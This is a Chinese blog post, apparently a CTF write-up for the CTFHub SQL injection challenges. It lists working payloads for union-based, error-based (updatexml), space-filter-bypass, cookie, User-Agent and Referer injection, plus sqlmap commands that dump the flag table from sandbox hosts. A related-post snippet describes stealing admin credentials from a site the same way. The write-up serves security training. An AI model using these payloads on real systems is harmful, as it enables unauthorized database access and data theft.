CTFHUB之sql注入

于 2024-08-12 20:17:27 发布
阅读量499 收藏 7
点赞数 13
文章标签: sql 数据库
阿迪
本文链接:https://blog.csdn.net/2201_75569982/article/details/141141120
版权

1.整数型注

1.整数型注入

1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞

加单引号

去掉‘加上and 1=1发现出现了回显

将1=1变为1=2,语句正确但是无法访问数据库

这里可以判定这里存在数字注入漏洞

2.接下来判断字段数量

这里输入id=1 order by 2看是否字段数量是否是2个

3.查询SQL语句插入位置

这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置

查flag表字段

-1 union select group_concat(column_name),2 from information_schema.columns where table_name='flag' -- +

查flag字段的值:

-1 union select flag,2 from flag -- +

2、字符型注入

与上题同理
此处直接查询flag字段的值

-1' union select flag,2 from flag -- +

3、报错注入

查询库名

1 and updatexml(1,concat(0x7e,database()),3)

发现库名 sqli,对表名进行爆破

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆破出表名,对字段进行爆破

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli'and table_name='flag')),3)

得到字段flag,进行查询

?id=1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

布尔盲注

爆库名

python3 sqlmap.py -u http://challenge-ae03143b1b64
a785.sandbox.ctfhub.com:10800/?id=1 -current-db

爆数据

python3 sqlmap.py -u http://challenge-ae03143b1b64a785.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag -dump

时间盲注

同上 直接爆数据

python3 sqlmap.py -u http://challenge-4cadbdbe97d19103.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag -dump

Mysql结构

爆库

id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

爆数据

cook

gbeiyxcxzt

tlgybvewuv

UA注入

看表

gixbwoyqkp

爆字段名

negbfupuql

爆数据

1 and 1=2 union select 1, group_concat(negbfupuql ) from sqli.gixbwoyqkp#

Refer 注入

  1. 爆字段个数 order by 2可以, order by 3不行
  2. 爆库

sqli

爆表

eobzfwzgco

爆字段名

sehjtninev

爆数据

过滤空格

爆库名

?id=1/**/and/**/1=2/**/union/**/select/**/1,database()

爆表

id=1/**/and/**/1=2/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/'sqli'

tyrylslsbb

爆字段名

id=1/**/and/**/1=2/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'tyrylslsbb'

auauyqwwnv

爆数据

id=1/**/and/**/1=2/**/union/**/select/**/1,group_concat(auauyqwwnv)/**/from/**/sqli.tyrylslsbb

Ad
关注
CTFHUB-web-SQL注入
ookami6497的博客
11-29 851
CTFHUB SQL
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1742
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
【Web】ctfhub基础知识之sql注入
A_Gaming的博客
12-25 87
column_name:列的名称原文链接:https://blog.csdn.net/qq_58784379/article/details/119046308。
SQL联合注入结合hackbar
qq_59159350的博客
11-16 1355
SQL联合注入结合hackbar,sqlmap
黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
weixin_49349476的博客
09-27 2979
检查出网站存在的漏洞类型是字符型的SQL漏洞,之后利用火狐浏览中的Hackbar插件,进行SQL注入,获取登录账号和密码
利用hackbar进行sql注入简单实例
热门推荐
Ro_kin的博客
07-16 1万+
这个简单的实例是对一个网址进行sql注入,获得管理员的账号和密码目标网址:http://www.xxx/news_detail.php?id=186步骤如下: (1)先猜解当前网页的字段数 在hackbar的输入框中输入: http://www.xxx/news_detail.php?id=186 order by 7 页面显示正常,输入 http://www.xxx/news_deta
web渗透—SQL注入思路
dongxie_tk的博客
11-01 740
当拿到一个MySQL的注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。现在一般情况下,MySQL都是4.0以上的,所以我们就放心的用联合查
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5552
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1141
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1153
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
注入之SQL注入2
bwxzdjn的博客
03-19 1678
用实验案例的形式记录一些新的注入技术,如:POST注入、基于报错的注入、基于布尔的盲注和基于时间的盲注,采用手工注入的方法了解SQL注入的新的思路。
HackBar 开源项目教程
最新发布
gitblog_00178的博客
08-10 355
HackBar 开源项目教程 项目地址:https://gitcode.com/gh_mirrors/ha/HackBar 项目介绍 HackBar 是一个浏览器扩展,专为渗透测试和网络安全专业人员设计。它提供了一系列工具,帮助用户在浏览器中直接执行各种网络攻击测试,如SQL注入、XSS攻击等。该项目托管在GitHub上,地址为:https://github.com/d3vilbug/HackBa...
SQL labs靶场-SQL注入入门
2302_80280669的博客
07-22 598
sql注入为入门级的漏洞,现如今已经极为少见,但仍有其典型性。从此开始,便正式进入了黑客的大门。
初次实战SQL注入
dkxkl1314的博客
03-05 1111
首先是数字型,数字型正常来说是这两种结果,而在靶场中则是显示为相同的结果,原因是数据库将我们输入的1 and 1=1和1 and 1=2看做成'1 and 1=1'和'1 and 1=2',因为是字符型所以会自动的将我们输入的数据看成一体。怎么解决呢我们输入id=-1' union select 1,2 --+,让id=-1,这样数据可在查询的时候发现没有匹配的就不会显示,则直接显示我们输入的查询。'1 and 1=1'和'1 and 1=2'是两个字符串从被单引号引起来就能看出这一点,
SQL注入网站实例:注入步骤
老司机的后备箱
07-25 900
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 1773
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Web 渗透测试神器:HackBar 保姆级教程
Flag少侠的博客
04-30 1万+
HackBar 允许用户自定义 HTTP 请求,并可以通过插件直接发送这些请求。用户可以手动构造 GET、POST、PUT、DELETE 等类型的请求,并添加自定义的 HTTP 头部、参数等信息。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值